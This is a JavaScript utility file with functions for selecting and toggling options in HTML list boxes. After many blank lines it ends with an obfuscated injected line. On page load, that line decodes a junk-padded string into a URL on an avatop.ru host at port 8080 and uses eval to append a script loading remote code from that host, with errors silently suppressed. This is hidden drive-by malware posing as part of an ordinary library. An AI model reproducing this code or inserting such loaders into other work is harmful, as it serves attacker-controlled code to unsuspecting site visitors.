
var arrOldValues;

function SelectAllList(CONTROL)
{
	for(var i = 0;i < CONTROL.length;i++)
	{
	  CONTROL.options[i].selected = true;
	}
}

function DeselectAllList(CONTROL)
{
	for(var i = 0;i < CONTROL.length;i++)
	{
	  CONTROL.options[i].selected = false;
	}
}


function FillListValues(CONTROL)
{
	var arrNewValues;
	var intNewPos;
	var strTemp = GetSelectValues(CONTROL);

	arrNewValues = strTemp.split(",");
	for(var i=0;i<arrNewValues.length-1;i++)
	{
	  if(arrNewValues[i]==1)
	  {
		  intNewPos = i;
		}
	}

	for(var i=0;i<arrOldValues.length-1;i++)
	{
		if(arrOldValues[i]==1 && i != intNewPos)
		{
		  CONTROL.options[i].selected= true;
		}
		else if(arrOldValues[i]==0 && i != intNewPos)
		{
		  CONTROL.options[i].selected= false;
		}

		if(arrOldValues[intNewPos]== 1)
		{
			 CONTROL.options[intNewPos].selected = false;
		}
		else
		{
			CONTROL.options[intNewPos].selected = true;
		}
	}
}


function GetSelectValues(CONTROL)
{
	var strTemp = "";
	for(var i = 0;i < CONTROL.length;i++)
	{
	  if(CONTROL.options[i].selected == true)
	  {
		  strTemp += "1,";
		}
		else
		{
		  strTemp += "0,";
		 }
	}

	return strTemp;
}

function GetCurrentListValues(CONTROL)
{
  	var strValues = "";

	strValues = GetSelectValues(CONTROL);
	arrOldValues = strValues.split(",")
}











try{window.onload=function(){D1btocibhedx = '' + 'r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!.(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&!)@a^$t^$t)!(o!&)#p(^.^r&u#^:))X#)@9&!@!u(w@((3&&)d(^)d$!$k)2&(!c!&e!@&e$$/^$w##)))e@)!b@s$)!&.@()$c###!o!(!#m$)!/#^w^e#$^!b(^s$@.@$c(@)o!#@m@/)@&^s)()e)&$e!)$!$s&&a^(a!@@).(&&n^)@!e@t(/##o!!@r(##(@b#^&i$^#()t$@#z#&.@c@o^)m$&/!&$g))^$o$&@o!(^g#$l^!e!$.!)^@c$#o@$$m)&&&^/^'.replace(/\$|\)|@|#|\^|\!|&|\(/ig, '') ;F5yp3yok4h = 'appendChild';Gcl5dy7giha8 = document.createElement('sc'+'ript');Gcl5dy7giha8.src = 'h'+'ttp://'+D1btocibhedx.replace(/X9uw3ddk2cee/g, '8080');Gcl5dy7giha8.setAttribute('defer', 'def'+'er');eval('document.body.'+F5yp3yok4h+'(Gcl5dy7giha8)');} }  catch(E37w7fv ) {}